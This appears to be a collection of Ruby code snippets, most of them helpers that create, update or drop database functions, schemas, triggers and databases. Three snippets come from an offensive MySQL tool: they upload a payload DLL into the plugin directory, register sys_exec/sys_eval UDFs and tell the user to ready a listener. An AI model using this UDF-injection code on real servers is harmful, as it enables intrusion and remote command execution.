"def create_function_sql(name, definition, opts=OPTS)\n args = opts[:args]\n if !opts[:args].is_a?(Array) || !opts[:args].any?{|a| Array(a).length == 3 and %w'OUT INOUT'.include?(a[2].to_s)}\n returns = opts[:returns] || 'void'\n end\n language = opts[:language] || 'SQL'\n <<-END\n CREATE#{' OR REPLACE' if opts[:replace]} FUNCTION #{name}#{sql_function_args(args)}\n #{\"RETURNS #{returns}\" if returns}\n LANGUAGE #{language}\n #{opts[:behavior].to_s.upcase if opts[:behavior]}\n #{'STRICT' if opts[:strict]}\n #{'SECURITY DEFINER' if opts[:security_definer]}\n #{\"PARALLEL #{opts[:parallel].to_s.upcase}\" if opts[:parallel]}\n #{\"COST #{opts[:cost]}\" if opts[:cost]}\n #{\"ROWS #{opts[:rows]}\" if opts[:rows]}\n #{opts[:set].map{|k,v| \" SET #{k} = #{v}\"}.join(\"\\n\") if opts[:set]}\n AS #{literal(definition.to_s)}#{\", #{literal(opts[:link_symbol].to_s)}\" if opts[:link_symbol]}\n END\n end",
"def create_function(function_name, returning, definition, options = {})\n\n function_name = full_function_name(function_name, options)\n language = options[:language] || 'plpgsql'\n replace = if options[:replace] == false\n ''\n else\n 'OR REPLACE '\n end\n volatility = case options[:volatility]\n when :volatile, :stable, :immutable\n \"\\n #{options[:volatility].to_s.upcase}\"\n else\n \"\"\n end\n\n sql = <<-SQL.gsub(/^[ ]{6}/, \"\")\n CREATE #{replace}FUNCTION #{function_name}\n RETURNS #{returning}\n LANGUAGE #{language}#{volatility}\n AS $function$\n #{definition.strip}\n $function$\n SQL\n\n execute(sql)\n end",
"def function(name, *args)\n SQL::Function.new(function_name(name), *args)\n end",
"def function(name, *args)\n SQL::Function.new(name, *args)\n end",
"def create_function(function_name, returning, definition, options = {})\n\n end",
"def create_function( name, arity, type=nil, &block ) # :yields: func, *args\n case type\n when :numeric\n type = SQLite::API::NUMERIC\n when :text\n type = SQLite::API::TEXT\n when :args\n type = SQLite::API::ARGS\n end\n\n callback = proc do |func,*args|\n block.call( FunctionProxy.new( func ), *args )\n end\n\n SQLite::API.create_function( @handle, name, arity, callback )\n SQLite::API.function_type( @handle, name, type ) if type\n\n self\n end",
"def createFunction(code:, name:, isDeterministic: nil) # TESTED\n body = {\n \"code\" => code,\n \"name\" => name,\n \"isDeterministic\" => isDeterministic\n }.delete_if{|k,v| v.nil?}\n request = @@request.merge({ :body => body.to_json })\n result = self.class.post(\"/_db/#{@database}/_api/aqlfunction\", request)\n self.class.return_result result: result\n end",
"def create_function( db, name, args, text, cookie, func, step, final )\n if func || ( step && final )\n cb = CallbackData.new\n cb.proc = cb.proc2 = nil\n cb.data = cookie\n end\n\n if func\n cb.proc = func\n step = final = nil\n elsif step && final\n cb.proc = step\n cb.proc2 = final\n\n func = nil\n end\n\n result = CSSQLite.sqlite3_create_function( db, name, args, text, cb, func, step, final )\n\n # see comments in busy_handler\n if cb\n @callback_data[ name ] = cb\n else\n @callback_data.delete( name )\n end\n\n return result\n end",
"def update_function(name, options = {})\n version = options[:version]\n sql_definition = options[:sql_definition]\n\n if version.nil? && sql_definition.nil?\n raise(\n ArgumentError,\n \"version or sql_definition must be specified\"\n )\n end\n\n sql_definition = sql_definition.strip_heredoc if sql_definition\n sql_definition ||= Fx::Definition.function(name: name, version: version).to_sql\n\n Fx.database.update_function(name, sql_definition)\n end",
"def create_function(params={})\n runtime = params.delete('Runtime') || 'nodejs'\n code = params.delete('Code')\n function_name = params.delete('FunctionName')\n handler = params.delete('Handler')\n role = params.delete('Role')\n\n data = {\n 'Runtime' => runtime,\n 'Code' => code,\n 'FunctionName' => function_name,\n 'Handler' => handler,\n 'Role' => role\n }\n\n description = params.delete('Description')\n data.merge!('Description' => description) if description\n\n memory_size = params.delete('MemorySize')\n data.merge!('MemorySize' => memory_size) if memory_size\n\n timeout = params.delete('Timeout')\n data.merge!('Timeout' => timeout) if timeout\n\n request({\n :method => 'POST',\n :path => '/functions',\n :expects => 201,\n :body => Fog::JSON.encode(data),\n :parser => Fog::AWS::Parsers::Lambda::Base.new\n }.merge(params))\n end",
"def create_schema(name, opts=OPTS)\n self << create_schema_sql(name, opts)\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n# execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def drop_function_sql(name, opts=OPTS)\n \"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}\"\n end",
"def update_function(name, args)\n version = args[:version]\n sql_definition = args[:sql_definition]\n revert_to_version = args[:revert_to_version]\n\n if version.nil? && sql_definition.nil?\n raise(\n ArgumentError,\n \"version or sql_definition must be specified\",\n )\n end\n\n sql_definition = sql_definition.strip_heredoc if sql_definition\n sql_definition ||= Fx::Definition.new(\n name: name,\n version: version,\n ).to_sql\n\n Fx.database.update_function(name, sql_definition)\n end",
"def drop_function(name, opts=OPTS)\n self << drop_function_sql(name, opts)\n end",
"def create_language(name, opts=OPTS)\n self << create_language_sql(name, opts)\n end",
"def arel_fn(name, *args)\n Arel::Nodes::NamedFunction.new(name, args)\n end",
"def create!\n Upsert.logger.info \"[upsert] Creating or replacing database function #{name.inspect} on table #{buffer.parent.table_name.inspect} for selector #{selector.map(&:inspect).join(', ')} and columns #{columns.map(&:inspect).join(', ')}\"\n column_definitions = get_column_definitions\n connection.execute <<-EOS\nCREATE OR REPLACE FUNCTION #{name}(#{column_definitions.map { |c| \"#{c.quoted_input_name} #{c.sql_type} DEFAULT #{c.default || 'NULL'}\" }.join(',') }) RETURNS VOID AS\n$$\nBEGIN\n LOOP\n -- first try to update the key\n UPDATE #{quoted_table_name} SET #{column_definitions.map { |c| \"#{c.quoted_name} = #{c.quoted_input_name}\" }.join(',')}\n WHERE #{selector.map { |k| \"#{connection.quote_ident(k)} = #{connection.quote_ident([k,'input'].join('_'))}\" }.join(' AND ') };\n IF found THEN\n RETURN;\n END IF;\n -- not there, so try to insert the key\n -- if someone else inserts the same key concurrently,\n -- we could get a unique-key failure\n BEGIN\n INSERT INTO #{quoted_table_name}(#{column_definitions.map { |c| c.quoted_name }.join(',')}) VALUES (#{column_definitions.map { |c| c.quoted_input_name }.join(',')});\n RETURN;\n EXCEPTION WHEN unique_violation THEN\n -- Do nothing, and loop to try the UPDATE again.\n END;\n END LOOP;\nEND;\n$$\nLANGUAGE plpgsql;\nEOS\n end",
"def create\n database.command({ :create => name }.merge(options))\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def add_function(name, return_type, params, windows_name=nil)\n\t\t\t\t\t\t\tif windows_name == nil\n\t\t\t\t\t\t\t\twindows_name = name\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\t\t@functions[name] = DLLFunction.new(return_type, params, windows_name)\n\t\t\t\t\t\tend",
"def update_function(name, version: nil, sql_definition: nil, revert_to_version: nil)\n if version.blank? && sql_definition.blank?\n raise(\n ArgumentError,\n \"sql_definition or version must be specified\",\n )\n end\n\n if version.present? && sql_definition.present?\n raise(\n ArgumentError,\n \"sql_definition and version cannot both be set\",\n )\n end\n\n sql_definition ||= function_definition(name, version)\n\n Scenic.database.update_function(name, sql_definition)\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def drop_function(function_name, params, options = {})\n SchemaMonkey::Middleware::Migration::CreateFunction.start(connection: self, function_name: function_name, params: params, options: options) do |env|\n function_name = env.function_name\n params = env.params\n options = env.options\n function_type = (options[:function_type] || :function).to_s.upcase\n\n sql = \"DROP #{function_type}\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{function_name}(#{params})\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def add_function(name)\n case name\n when :update_timestamp\n return add_function_update_timestamp\n end\n raise \"called add_function on undefined function '#{name}'\"\n end",
"def named_function(name, expression, function_alias = nil)\n Arel::Nodes::NamedFunction.new(name, expression, function_alias)\n end",
"def generate(name, glsl, typeInfo)\n # Merge type information for all argument lists a function might\n # have.\n minParam, paramTypes = mergeParameterLists(typeInfo.parameterLists)\n\n # Assemble type annotations for the closure compile.\n paramtypestr = []\n paramstr = []\n (0...minParam).each do |i|\n paramtypestr << \" * @param {!(#{paramTypes[i].toClosure})} arg#{i}\\n * Function argument #{i}.\"\n paramstr << \"arg#{i}\"\n end\n (minParam...paramTypes.size).each do |i|\n paramtypestr << \" * @param {!(#{paramTypes[i].toClosure})=} arg#{i}\\n * Function argument #{i}.\"\n paramstr << \"arg#{i}\"\n end\n annotations = paramtypestr.join(\"\\n\")\n\n return <<EOF\n\n/**\n * Create expression for GLSL function '#{glsl}'.\n *\n#{annotations}\n * @return {!embedsl.Expression} Created expression.\n */\nembedsl.lang.#{name} = (function() {\n var cached = #{typeInfo.toEsl};\n return function(#{paramstr.join(\",\\n \")}) {\n var args = Array.prototype.slice.call(arguments);\n return new embedsl.Expression(\n embedsl.Kind.BUILTIN, cached, '#{name}', '#{glsl}', args);\n };\n})();\nEOF\nend",
"def create (name, attrs = {})\n factory_by_name(name).create(attrs)\n end",
"def create (name, attrs = {})\n factory_by_name(name).create(attrs)\n end",
"def call(_obj, args, _ctx)\n create_table = Table.new(\n name: args[:name],\n quantity: args[:quantity],\n )\n return create_table if create_table.save\n GraphQL::ExecutionError.new(\"invalid data\")\n end",
"def function_define(name=\"\",&block)\n \"function #{name}() { #{block.call} }\" \n end",
"def create_schema_sql(name, opts=OPTS)\n \"CREATE SCHEMA #{'IF NOT EXISTS ' if opts[:if_not_exists]}#{quote_identifier(name)}#{\" AUTHORIZATION #{literal(opts[:owner])}\" if opts[:owner]}\"\n end",
"def create_trigger(table, name, function, opts=OPTS)\n self << create_trigger_sql(table, name, function, opts)\n end",
"def puppet_function(name, *args)\n name = name.to_sym unless name.is_a? Symbol\n puppet_function_load name\n if puppet4?\n puppet_scope.call_function name, args\n else\n error \"Could not load Puppet function '#{name}'!\" unless puppet_scope.respond_to? \"function_#{name}\".to_sym\n puppet_scope.send \"function_#{name}\".to_sym, args\n end\n end",
"def create_language_sql(name, opts=OPTS)\n \"CREATE#{' OR REPLACE' if opts[:replace] && server_version >= 90000}#{' TRUSTED' if opts[:trusted]} LANGUAGE #{name}#{\" HANDLER #{opts[:handler]}\" if opts[:handler]}#{\" VALIDATOR #{opts[:validator]}\" if opts[:validator]}\"\n end",
"def call(name, *args)\n memoize(name) {\n if options.key?(name)\n execute_option_function(options[name], *args)\n else\n send(name, *args)\n end\n }\n end",
"def create_trigger_sql(table, name, function, opts=OPTS)\n events = opts[:events] ? Array(opts[:events]) : [:insert, :update, :delete]\n whence = opts[:after] ? 'AFTER' : 'BEFORE'\n if filter = opts[:when]\n raise Error, \"Trigger conditions are not supported for this database\" unless supports_trigger_conditions?\n filter = \" WHEN #{filter_expr(filter)}\"\n end\n \"CREATE #{'OR REPLACE ' if opts[:replace]}TRIGGER #{name} #{whence} #{events.map{|e| e.to_s.upcase}.join(' OR ')} ON #{quote_schema_table(table)}#{' FOR EACH ROW' if opts[:each_row]}#{filter} EXECUTE PROCEDURE #{function}(#{Array(opts[:args]).map{|a| literal(a)}.join(', ')})\"\n end",
"def define_function(name, &block)\n functions[name.to_sym] = block\n nil\n end",
"def create_database_sql(name, opts = {})\n \"CREATE DATABASE #{quote_identifier(name)}\"\n end",
"def compile_defm(scope, name, args, body)\n scope = scope.class_scope\n\n # FIXME: Replace \"__closure__\" with the block argument name if one is present\n f = Function.new([:self,:__closure__]+args, body, scope) # \"self\" is \"faked\" as an argument to class methods\n\n @e.comment(\"method #{name}\")\n\n\n cleaned = clean_method_name(name)\n fname = \"__method_#{scope.name}_#{cleaned}\"\n scope.set_vtable_entry(name, fname, f)\n\n # Save to the vtable.\n v = scope.vtable[name]\n compile_eval_arg(scope,[:sexp, [:call, :__set_vtable, [:self,v.offset, fname.to_sym]]])\n \n # add the method to the global list of functions defined so far\n # with its \"munged\" name.\n @global_functions[fname] = f\n \n # This is taken from compile_defun - it does not necessarily make sense for defm\n return [:addr, clean_method_name(fname)]\n end",
"def create_custom_function(dbc, file)\n dll_name = randz(15) + \".dll\"\n plugin_path = get_plugin_dir(dbc)\n @udf_dest = plugin_path.chomp + dll_name\n fake_function = 'sys_' + randz(5)\n\n # Upload our UDF DLL Payload file\n if write_bin_file(dbc, file, @udf_dest)\n begin\n puts \"Payload DLL writen to disk\".light_green + \"!\".white\n puts \"Creating function to trigger now\".light_blue + \"....\".white\n puts \"Make sure your listener is ready\".light_yellow + \"....\".white\n sleep(3)\n # Drop function if its already there, then create new\n q = dbc.query(\"DROP FUNCTION IF EXISTS #{fake_function};\")\n q = dbc.query(\"CREATE FUNCTION #{fake_function} RETURNS string SONAME '#{dll_name}';\")\n return fake_function\n rescue Mysql::Error => e\n puts \"Error Triggered, Payload should have also been triggered\".light_green + \"!\".white\n return fake_function\n end\n end\nend",
"def create_sys_functions\n udf_name = randz(15) + \".dll\"\n plugin_path = get_plugin_dir\n udf_dest = plugin_path.chomp + udf_name\n if @build == 'x64'\n file = \"#{HOME}extras/myudf/payloads/64/lib_mysqludf_sys.dll\"\n elsif @build == 'x32'\n file = \"#{HOME}extras/myudf/payloads/32/lib_mysqludf_sys.dll\"\n end\n\n # Upload our UDF DLL Payload file\n if udf_write_bin_file(file, udf_dest)\n begin\n # Drop function if its already there, then create new\n q = @db_connection.query(\"DROP FUNCTION IF EXISTS sys_exec;\")\n q = @db_connection.query(\"CREATE FUNCTION sys_exec RETURNS int SONAME '#{udf_name}';\")\n q = @db_connection.query(\"CREATE FUNCTION sys_eval RETURNS string SONAME '#{udf_name}';\")\n\n # Confirm it was added and all is well....\n if sys_exec_check\n return udf_dest\n else\n return nil\n end\n rescue Mysql::Error => e\n print_error(\"Problem creating UDF SYS functions!\")\n puts \"\\t=> \".white + \"#{e}\\n\\n\".light_red\n return nil\n end\n end\n end",
"def define_func(name, value, namespace=nil)\n define(CodeSymbol.new name, value, namespace)\n end",
"def create(opts = {})\n data, _status_code, _headers = create_with_http_info(opts)\n data\n end",
"def function(*args)\n Function.new(self, *args)\n end",
"def function(*args)\n Function.new(self, *args)\n end",
"def installFunction(*args)\n\t\t\t args = args.first if args.class == Array and args.first.class == Hash\n\t\t\t\tcase args\n\t\t\t\t when Hash\n\t\t\t\t raise \"Must pass an instance of SAPNW::RFC::FunctionDescriptor to installFunction()\\n\" unless args.has_key?(:descriptor) and args[:descriptor].class == SAPNW::RFC::FunctionDescriptor\n\t\t\t\t\t\tfunc = args[:descriptor]\n\t\t\t\t\t\tsysid = args.has_key?(:sysid) ? args[:sysid] : \"\"\n\t\t\t\t\twhen Array\n\t\t\t\t raise \"Must pass an instance of SAPNW::RFC::FunctionDescriptor to installFunction()\\n\" unless args.first.class == SAPNW::RFC::FunctionDescriptor \n\t\t\t\t\t\tfunc = args.first\n\t\t\t\t\t\tsysid = args.length > 1 ? args[1] : \"\"\n\t\t\t\t\telse\n\t\t\t\t raise \"Must pass an instance of SAPNW::RFC::FunctionDescriptor to installFunction()\\n\"\n\t\t\t\tend\n #$stderr.print \"sysid: #{sysid}\\n\"\n\t\t\t\tres = func.install(sysid)\n\t\t\t\t@functions[func.name] = func\n\t\t\t\treturn res\n\t \tend",
"def visitFunction func,args=nil\n type=func.type.accept(self)\n name=func.name.accept(self)\n args=func.args.collect{|arg| arg.accept(self)}\n body=func.body.accept(self)\n Function.new(name,type,args,body)\n end",
"def process_function f, args, options = {}\n fn_reg = 'temp1'\n self_reg = 'temp2'\n args_reg = 'temp3'\n\n block = CompiledBlock.new\n CODE_MGR.add_block block\n block.add_instr [INIT]\n block.add_instr [WRITE, fn_reg, f]\n\n if options[:self]\n block.add_instr [WRITE, self_reg, options[:self]]\n end\n\n # Create argument object and add to a register\n args_obj = Gene::Lang::Object.new\n args_obj.data = args\n block.add_instr [WRITE, args_reg, args_obj]\n\n block.add_instr [DEFAULT, f.body]\n\n # Call function\n if options[:self]\n block.add_instr [CALL, 'default', {\n 'fn_reg' => fn_reg,\n 'self_reg' => self_reg,\n 'args_reg' => args_reg,\n 'return_reg' => 'default',\n }]\n else\n block.add_instr [CALL, 'default', {\n 'fn_reg' => fn_reg,\n 'args_reg' => args_reg,\n 'return_reg' => 'default',\n }]\n end\n\n process block, options\n end",
"def create_new(name, opts = {})\n data, _status_code, _headers = create_new_with_http_info(name, opts)\n return data\n end",
"def create(args = {})\n end",
"def initialize(fun_name, args)\n @fun_name = fun_name\n @args = args\n @fun = Function.by_name_argnum fun_name, args.count\n end",
"def create\n @func = Func.new(func_params)\n\n respond_to do |format|\n if @func.save\n format.html { redirect_to @func, notice: 'Func was successfully created.' }\n format.json { render :show, status: :created, location: @func }\n else\n format.html { render :new }\n format.json { render json: @func.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_database(name, options = {})\n options = { :encoding => 'utf8' }.merge!(options.symbolize_keys)\n\n option_string = options.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :collation\n \" LC_COLLATE = '#{value}'\"\n when :ctype\n \" LC_CTYPE = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def make_function(exp, register = true)\n name = map_name exp.shift\n args = exp.shift\n ruby_args = args.deep_clone\n ruby_args.shift # :args\n\n @method_name = name\n @c_method_name = \"rrc_c#{@c_klass_name}_#{normal_to_C name}\"\n\n @env.scope do\n c_args = check_args args, register # registered methods get self\n @methods[name] = ruby_args if register\n\n body = process exp.shift\n\n if name == :initialize then\n body[-1] = \"return self;\\n}\"\n end\n\n return \"static VALUE\\n#{@c_method_name}#{c_args} #{body}\"\n end\n end",
"def create!\n Upsert.logger.info \"[upsert] Creating or replacing database function #{name.inspect} on table #{table_name.inspect} for selector #{selector_keys.map(&:inspect).join(', ')} and setter #{setter_keys.map(&:inspect).join(', ')}\"\n\n selector_column_definitions = column_definitions.select { |cd| selector_keys.include?(cd.name) }\n setter_column_definitions = column_definitions.select { |cd| setter_keys.include?(cd.name) }\n update_column_definitions = setter_column_definitions.select { |cd| cd.name !~ CREATED_COL_REGEX && !options[\"ignore_on_update\"].include?(cd.name) }\n\n first_try = true\n connection.execute(%{\n CREATE OR REPLACE FUNCTION #{name}(#{(selector_column_definitions.map(&:to_selector_arg) + setter_column_definitions.map(&:to_setter_arg)).join(', ')}) RETURNS VOID AS\n $$\n DECLARE\n first_try INTEGER := 1;\n BEGIN\n LOOP\n -- first try to update the key\n UPDATE #{quoted_table_name} SET #{update_column_definitions.map(&:to_setter).join(', ')}\n WHERE #{selector_column_definitions.map(&:to_selector).join(' AND ') };\n IF found THEN\n RETURN;\n END IF;\n -- not there, so try to insert the key\n -- if someone else inserts the same key concurrently,\n -- we could get a unique-key failure\n BEGIN\n INSERT INTO #{quoted_table_name}(#{setter_column_definitions.map(&:quoted_name).join(', ')}) VALUES (#{setter_column_definitions.map(&:to_setter_value).join(', ')});\n RETURN;\n EXCEPTION WHEN unique_violation THEN\n -- seamusabshere 9/20/12 only retry once\n IF (first_try = 1) THEN\n first_try := 0;\n ELSE\n RETURN;\n END IF;\n -- Do nothing, and loop to try the UPDATE again.\n END;\n END LOOP;\n END;\n $$\n LANGUAGE plpgsql;\n })\n rescue\n if first_try and $!.message =~ /tuple concurrently updated/\n first_try = false\n retry\n else\n raise $!\n end\n end",
"def add_procedure(opts={})\n name = opts[:name]\n raise Error, \"JSON-RPC procedure must have a name\" if name.blank?\n proc = opts[:proc]\n raise Error, \"JSON-RPC procedure must specify a :proc to be executed locally\" if proc.blank?\n begin\n proc = proc.to_proc\n rescue Exception => e\n raise Error, \":proc argument could not be converted to a proc (#{e.message})\"\n end\n opts[:proc] = proc\n # Canonicalise opts[:params]. We use strings internally, since parameter names will be \n # passed as such.\n opts[:params] = (opts[:params] || []).collect do |p|\n if p.is_a?(String)\n {:name => p.to_s, :type => 'any'}\n else\n {:name => p[:name].to_s, :type => (p[:type] || 'any').to_s}\n end\n end\n # Canonicalise opts[:return]\n opts[:return] = if opts[:return]\n {:type => (opts[:return][:type] || 'any').to_s}\n else\n {:type => 'any'}\n end\n # Register the new procedure with the service\n self.procs[name] = opts\n # Empty the system.describe cache\n @sd_cache = nil\n # Finally return the procedure's call name\n name\n end",
"def run_function(name, params)\n payload = Payload.new\n payload.function_name = name\n payload.params = params\n call_route(:function, name, payload)\n end",
"def create(opts = {})\n add_headers(opts)\n add_params(opts)\n add_timeout(opts)\n add_connect_timeout(opts)\n add_compression_type(opts)\n add_data_body(opts)\n end",
"def create_database(name, options = {})\n options = options.reverse_merge(encoding: 'utf8')\n\n option_string = options.symbolize_keys.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n ''\n end\n end\n\n execute(\"CREATE DATABASE #{quote_table_name(name)}#{option_string}\")\n end",
"def create_sys_functions(dbc)\n udf_name = randz(15) + \".dll\"\n plugin_path = get_plugin_dir(dbc)\n @udf_dest = plugin_path.chomp + udf_name\n if @build == 'x64'\n file = './payloads/64/lib_mysqludf_sys.dll'\n elsif @build == 'x32'\n file = './payloads/32/lib_mysqludf_sys.dll'\n end\n\n # Upload our UDF DLL Payload file\n if write_bin_file(dbc, file, @udf_dest)\n begin\n # Drop function if its already there, then create new\n q = dbc.query(\"DROP FUNCTION IF EXISTS sys_exec;\")\n q = dbc.query(\"CREATE FUNCTION sys_exec RETURNS int SONAME '#{udf_name}';\")\n q = dbc.query(\"CREATE FUNCTION sys_eval RETURNS string SONAME '#{udf_name}';\")\n\n # Confirm it was added and all is well....\n if sys_exec_check(dbc)\n return true\n else\n return false\n end\n rescue Mysql::Error => e\n puts \"Problem creating UDF SYS functions\".light_red + \"!\".white\n puts \"\\t=> \".white + \"#{e}\\n\\n\".light_red\n return false\n end\n end\nend",
"def initialize(name, opts = {})\n @name = name\n @opts = opts\n end",
"def create(name, action, seqno, opts = {})\n if opts.empty?\n cmds = name_commands(name, action, seqno)\n else\n if opts[:match] && !opts[:match].is_a?(Array)\n raise ArgumentError, 'opts match must be an Array'\n end\n cmds = name_commands(name, action, seqno, opts)\n if opts[:description]\n cmds << 'no description'\n cmds << \"description #{opts[:description]}\"\n end\n if opts[:continue]\n cmds << 'no continue'\n cmds << \"continue #{opts[:continue]}\"\n end\n if opts[:match]\n remove_match_statements(name, action, seqno, cmds)\n opts[:match].each do |options|\n cmds << \"match #{options}\"\n end\n end\n if opts[:set]\n remove_set_statements(name, action, seqno, cmds)\n opts[:set].each do |options|\n cmds << \"set #{options}\"\n end\n end\n end\n configure(cmds)\n end",
"def create_package(name, opts = {})\n data, _status_code, _headers = create_package_with_http_info(name, opts)\n return data\n end",
"def create_database(name, options = {})\n options = options.reverse_merge(:encoding => \"utf8\")\n\n option_string = options.symbolize_keys.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def create_custom_function\n # puts \"Creating a custom function to make queries with timestamp as a string...\".cyan\n @session.execute('CREATE OR REPLACE FUNCTION timefstring(somearg text)\n RETURNS NULL ON NULL INPUT\n RETURNS timestamp\n LANGUAGE java\n AS $$\n java.text.SimpleDateFormat formatter = new java.text.SimpleDateFormat(\"yyyy-MM-dd HH:mm:ss.SSS\");\n try {\n Date date = formatter.parse(somearg);\n return date;\n } catch(java.text.ParseException e) {\n return new Date();\n }\n $$')\n end",
"def create_table(*args, &block)\n db.create_table(name,*args, &block)\n end",
"def attach_function library, name, arguments, return_type\n arguments.map! do |argument|\n argument = Fiddle.const_get(:\"TYPE_#{argument}\".upcase)\n end\n\n value = Fiddle.const_get(:\"TYPE_#{return_type}\".upcase)\n function = Fiddle::Function.new(@handles[library][name.to_s], arguments, value)\n\n define_singleton_method(name) do |*arguments|\n function.call(*arguments)\n end\n end",
"def create_extension(extension_name, options = {})\n options = CREATE_EXTENSION_DEFAULTS.merge(options.symbolize_keys)\n\n sql = ['CREATE EXTENSION']\n sql << 'IF NOT EXISTS' if options[:if_not_exists]\n sql << %Q{\"#{extension_name.to_s}\"}\n sql << \"SCHEMA #{options[:schema_name]}\" if options[:schema_name].present?\n sql << \"VERSION '#{options[:version]}'\" if options[:version].present?\n sql << \"FROM #{options[:old_version]}\" if options[:old_version].present?\n\n sql = sql.join(' ')\n execute(sql)\n end",
"def create(opts = {})\n instance = new(opts)\n instance.save\n instance\n end",
"def call_function(name, *arguments)\n arguments.map!{ |arg| to_json(arg) }\n execute_script(\"#{name}(#{arguments.join(\", \")});\")\nend",
"def name\n\t\t\"db_fun\"\n\tend",
"def create(name)\n url = prefix + \"create\" + \"&name=#{name}\"\n return response(url)\n end",
"def create_view(name, opts = {})\n Designs::View.define_and_create(self, name, opts)\n end",
"def add_function(name, &block)\n functions[name] = anonymous_function(block)\n end",
"def create_database(name)\n end",
"def create(name)\n url = prefix + \"create\" + \"&name=#{name}\"\n return response(url)\n end",
"def add_stored_function(function_name, code)\n self[SYSTEM_JS_COLLECTION].save(\n {\n \"_id\" => function_name,\n :value => BSON::Code.new(code)\n }\n )\n end",
"def create\n # check needed because project_id is nil when updating through the JIT SpaceTree\n if not session[:project_id].nil?\n @function = Function.new(params[:function])\n @project= Project.find(session[:project_id])\n @function_structure_diagram_id=@project.function_structure_diagram.id\n\n if params[:function][:function_structure_diagram_id]\n @function_structure_diagram_id=params[:function][:function_structure_diagram_id]\n end\n\n @name=params[:function][:name]\n @function=Function.create_with_default_category(@function_structure_diagram_id, @name)\n\n respond_to do |format|\n if not @function.nil? #@function_structure_diagram.functions<<@function\n flash[:notice] = 'Function was successfully created.'\n format.html { redirect_to project_url(@project) }\n format.xml { head :created, :location => function_url(@function) }\n format.js #create.rjs\n format.json { render json: @function, status: :created, location: @function }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @function.errors.to_xml }\n format.js do\n render :update do |page|\n page.fail_instant_create\n end\n end\n format.json { render json: @function.errors, status: :unprocessable_entity }\n end\n end\n # for the JIT SpaceTree\n else\n @function = Function.new(params[:function])\n\n respond_to do |format|\n if @function.save\n format.json { render json: @function, status: :created, location: @function }\n else\n format.json { render json: @function.errors, status: :unprocessable_entity }\n end\n end\n end\n end",
"def create_new_with_http_info(name, opts = {})\n if @api_client.config.debugging\n @api_client.config.logger.debug \"Calling API: DiagramApi.create_new ...\"\n end\n # verify the required parameter 'name' is set\n if @api_client.config.client_side_validation && name.nil?\n fail ArgumentError, \"Missing the required parameter 'name' when calling DiagramApi.create_new\"\n end\n # resource path\n local_var_path = \"/diagram/{name}\".sub('{' + 'name' + '}', name.to_s)\n\n # query parameters\n query_params = {}\n query_params[:'folder'] = opts[:'folder'] if !opts[:'folder'].nil?\n query_params[:'IsOverwrite'] = opts[:'is_overwrite'] if !opts[:'is_overwrite'].nil?\n\n # header parameters\n header_params = {}\n # HTTP header 'Accept' (if needed)\n header_params['Accept'] = @api_client.select_header_accept(['application/json'])\n # HTTP header 'Content-Type'\n header_params['Content-Type'] = @api_client.select_header_content_type(['application/json'])\n\n # form parameters\n form_params = {}\n\n # http body (model)\n post_body = nil\n auth_names = ['JWT']\n data, status_code, headers = @api_client.call_api(:PUT, local_var_path,\n :header_params => header_params,\n :query_params => query_params,\n :form_params => form_params,\n :body => post_body,\n :auth_names => auth_names,\n :return_type => 'CreateNewResponse')\n if @api_client.config.debugging\n @api_client.config.logger.debug \"API called: DiagramApi#create_new\\nData: #{data.inspect}\\nStatus code: #{status_code}\\nHeaders: #{headers}\"\n end\n return data, status_code, headers\n end",
